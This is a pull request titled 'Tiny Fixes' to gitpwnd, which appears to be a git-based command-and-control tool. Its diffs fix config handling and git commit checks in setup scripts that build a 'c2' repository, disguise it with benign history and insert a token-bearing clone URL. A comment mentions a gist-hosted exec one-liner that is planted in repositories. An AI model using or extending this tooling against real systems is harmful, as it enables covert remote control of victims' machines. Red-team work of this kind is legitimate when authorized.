### PR TITLE
Tiny Fixes

### DIFF
--- a/gitpwnd/agent.py.template
+++ b/gitpwnd/agent.py.template
@@ -173,14 +173,16 @@ def main(repo_dir, private_git_url, remote_repo_name, remote_repo_master_branch)
 
 # Is git's user.name or user.email unset?
 def git_commit_info_is_unset():
-    # If they haven't set their username they probably also haven't set their email
-    # TODO: in the future, improve this to handle one being set and the other not
-    try:
-        # throws an exception if no git user name is set
-        subprocess.check_output("git config --get user.name", shell=True)
-        return False
-    except:
+    return_codes = []
+    for field in ["name", "email"]:
+        out = subprocess.Popen("git config --get user.%s" % (field), stdout=subprocess.PIPE, shell=True)
+        _ = out.communicate()[0]
+        return_codes.append(out.returncode)
+
+    # If either one didn't return a value, say that git info is unset
+    if return_codes.count(0) != 2:
         return True
+    return False
 
 # Unsets the git user.name and user.email
 def remove_git_commit_info():

--- a/server/gitpwnd/util/crypto_helper.py
+++ b/server/gitpwnd/util/crypto_helper.py
@@ -12,4 +12,4 @@ class CryptoHelper:
         h.update(payload.encode('utf-8'))
         signature = "sha1=" + h.hexdigest()
 
-        return hmac.compare_digest(signature, secret):
+        return hmac.compare_digest(signature, secret)

--- a/setup.py
+++ b/setup.py
@@ -169,6 +169,9 @@ copy somewhere safe if you want to re-run this script later.
 
 
     should_sync_c2_history = True # are we going to push the benign git history to the newly created c2 git repo?
+    
+    config["primary_clone_url"] = "https://%s@github.com/%s/%s.git" % (config["main_github_token"],
+       config["main_github_username"], config["github_c2_repo_name"])
 
     print("[*] Creating private GitHub repo: %s/%s" % (config["main_github_username"], config["github_c2_repo_name"]) )
     try:
@@ -224,9 +227,6 @@ def sync_c2_history(config):
 
     # cd into cloned git repo to do git munging there
     os.chdir(config["benign_repo_path"])
-
-    config["primary_clone_url"] = "https://%s@github.com/%s/%s.git" % (config["main_github_token"],
-      config["main_github_username"], config["github_c2_repo_name"])
 
     # Push history and tags
     subprocess.check_output("git push --all --repo " + config["primary_clone_url"], shell=True)

--- a/setup.py
+++ b/setup.py
@@ -388,15 +388,16 @@ def _add_file_to_c2_repo(config, template_file_path, params, dest_path_in_c2_rep
     with open(dest_file, "w") as f:
         f.write(templatized_file.safe_substitute(params))
 
-    # Add agent.py to the c2 repo #
+    # Add file to the c2 repo
     orig_dir = os.path.abspath(os.curdir)
     # cd into cloned git repo to do git munging there
     os.chdir(config["benign_repo_path"])
-
-    # Add agent.py and push
-    subprocess.check_output("git add %s" % dest_path_in_c2_repo, shell=True)
-    subprocess.check_output("git commit -m 'Add %s'" % dest_path_in_c2_repo, shell=True)
-    subprocess.check_output("git push --repo %s" % config["primary_clone_url"], shell=True)
+    
+    if "nothing to commit" not in str(subprocess.check_output("git status", shell=True)):
+        # Add agent.py and push
+        subprocess.check_output("git add %s" % dest_path_in_c2_repo, shell=True)
+        subprocess.check_output("git commit -m 'Add %s'" % dest_path_in_c2_repo, shell=True)
+        subprocess.check_output("git push --repo %s" % config["primary_clone_url"], shell=True)
 
     os.chdir(orig_dir)
 

--- a/setup.py
+++ b/setup.py
@@ -338,11 +338,6 @@ def get_bootstrap_content(config):
 
     return templatized_bootstrap_file.safe_substitute(params)
 
-#     return """
-# with open("/tmp/gitpwnd", "w") as f:
-#     f.write("owned")
-# """
-
 # After all the setup has been done, get the one liner that should be placed in a repo
 def get_python_one_liner(gist_url):
     # Note that `exec` is required for multiline statements, eval seems to only do simple expressions
@@ -475,8 +470,13 @@ def main(setup_dir, repo_dir, ssh_key_dir):
 
     # Usage: python3 setup.py <optional path to config.yml>
     if len(sys.argv) > 1:
-        with open(sys.argv[1], 'r') as f:
-            config = yaml.load(f)
+        config_path = sys.argv[1]
+    else:
+        print("[*] Using default config path of ./config.yml")  
+        config_path = "./config.yml"
+
+    with open(config_path, 'r') as f:
+        config = yaml.load(f)
 
 
 


### PR DESCRIPTION
Changelog:
- Check if both git username and email are set, instead of just the username.
- Remove commented code
- Use a default path for `config.yml`; currently, a "local variable `config` referenced before assignment" error occurs if you run `$ python3 setup.py`
- Fixes a KeyError resulting from the "primary_clone_url" not being inserted into `config` when the user says "yes, continue with existing repository"
- Fixes an error where trying to commit a file (`agent.py`, `payload.py`) with no changes causes `git commit` to complain
- Remove trailing colon in `crypto_helper.py`